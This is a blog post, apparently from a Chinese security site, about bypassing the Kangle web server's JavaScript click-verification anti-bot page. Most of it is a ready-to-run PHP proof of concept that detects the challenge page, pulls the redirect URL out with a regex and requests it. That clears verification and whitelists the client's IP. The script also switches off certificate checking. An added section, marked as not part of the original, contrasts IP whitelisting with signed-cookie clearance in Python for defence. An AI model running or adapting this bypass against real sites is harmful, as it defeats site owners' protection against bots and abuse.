Kangle click-verification JS bypass: process and PoC

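Kangle's default click verification is very simple and can be bypassed completely with a regular-expression match. In addition, Kangle keeps an IP whitelist: if a client passes verification once within a short period, it can access the site content directly, without needing a cookie.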

Here is the PoC:

<?php

/*
Bypass BY :wafcloud
For technical research only; use for illegal purposes is strictly prohibited
A regex is enough to handle Kangle's default JS click verification
*/
$cookie_jar = tempnam('./tmp', 'cookie');

function curl($cookieUrl, $url = '', $addHeaders = [], $requestType = 'get', $requestData = '', $postType = '', $urlencode = true)
{
    if (empty($url))
        return '';
    // guard against an empty URL
    $headers = [
        'User-Agent: Mozilla/7.0 (Windows; U; Windows NT 6.1; zh-CN; rv:2.9) Gecko/2018052906 Firefox/3.0'
        // 'Referer:' . $url
    ];

    if (strtolower($postType) == 'json' && $requestType != 'get') {
        $headers[] = 'Content-Type: application/json; charset=utf-8';
        $requestData = is_array($requestData) ? json_encode($requestData) : $requestData;
        $headers[] = 'Content-Length: ' . strlen($requestData);
    }

    if (!empty($addHeaders))
        $headers = array_merge($headers, $addHeaders);

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieUrl);
    curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);

    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    // allow following 302 redirects

    // curl_setopt($ch, CURLOPT_PROXYAUTH, CURLAUTH_BASIC);
    // curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1');
    // curl_setopt($ch, CURLOPT_PROXYPORT, '123');
    // set proxy

    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    // add ssl
    if ($requestType == 'get') {
        curl_setopt($ch, CURLOPT_HEADER, false);
    } else if ($requestType == 'post') {
        curl_setopt($ch, CURLOPT_POST, 1);
    } else {
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, strtoupper($requestType));
    }
    // handle the request type
    if ($requestType != 'get') {
        if (is_array($requestData) && !empty($requestData)) {
            $temp = '';
            foreach ($requestData as $key => $value) {
                if ($urlencode) {
                    $temp .= rawurlencode(rawurlencode($key)) . '=' . rawurlencode(rawurlencode($value)) . '&';
                } else {
                    $temp .= $key . '=' . $value . '&';
                }
            }
            $requestData = substr($temp, 0, strlen($temp) - 1);
        }
        curl_setopt($ch, CURLOPT_POSTFIELDS, $requestData);
    }

    $result = curl_exec($ch);

    curl_close($ch);

    return $result;
}

// true when the response is the verification page (matched by its title)
function isSafe($html)
{
    return preg_match('/<title>安全防護系統<\/title>/', $html) == 1;
}

// extract the verification URL that the page's JS assigns to location.href
function getSafeUrl($cookie_jar, $url)
{
    $data = curl($cookie_jar, $url);

    if (isSafe($data)) {
        preg_match('/location.href =(.+);/', $data, $result);
        if (count($result) == 2) {
            $result = $result[1];
            $result = preg_replace('/"|\+/', '', $result);
            $result = preg_replace('/\s/', '', $result);
            return $url . $result;
        }
    }
    return '';
}
echo curl($cookie_jar, getSafeUrl($cookie_jar, "https://www.123.com/"));
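
The IP-whitelist behaviour described in this post, contrasted with a clearance bound to a signed cookie, as an added example that is not part of the original post and is not Kangle's own code. The secret, lifetime, function names and sample addresses are assumptions constructed for illustration.

```python
import hashlib
import hmac
import time

SECRET = b"constructed-demo-secret"  # assumption: random per-server key in practice
TTL = 600                            # assumption: clearance lifetime in seconds
_ip_whitelist = {}                   # ip -> expiry; models the behaviour the post describes


def whitelist_pass(client_ip, now):
    """Weak model: passing the challenge once whitelists the whole source IP."""
    _ip_whitelist[client_ip] = now + TTL


def whitelist_allows(client_ip, now):
    """Any request from that IP is admitted, with or without a cookie."""
    return _ip_whitelist.get(client_ip, 0) > now


def _sign(client_ip, user_agent, expires):
    msg = f"{client_ip}|{user_agent}|{expires}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def issue_clearance(client_ip, user_agent, now=None):
    """Hardened model: cookie value issued only after the challenge is passed."""
    expires = int(time.time() if now is None else now) + TTL
    return f"{expires}.{_sign(client_ip, user_agent, expires)}"


def check_clearance(cookie, client_ip, user_agent, now=None):
    """Every request must carry a valid, unexpired cookie; the IP alone grants nothing."""
    now = int(time.time() if now is None else now)
    try:
        expires_text, mac = cookie.split(".", 1)
        expires = int(expires_text)
    except (AttributeError, ValueError):
        return False  # missing or malformed cookie
    if expires <= now:
        return False
    expected = _sign(client_ip, user_agent, expires)
    return hmac.compare_digest(mac.encode(), expected.encode())
```

With the whitelist model, a second client behind the same address is admitted without ever seeing the challenge; with the signed cookie, a request that lacks the cookie, alters its expiry or changes User-Agent is sent back to verification.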

When reposting, please credit the source: AE博客|墨淵 » Kangle click-verification JS bypass: process and PoC
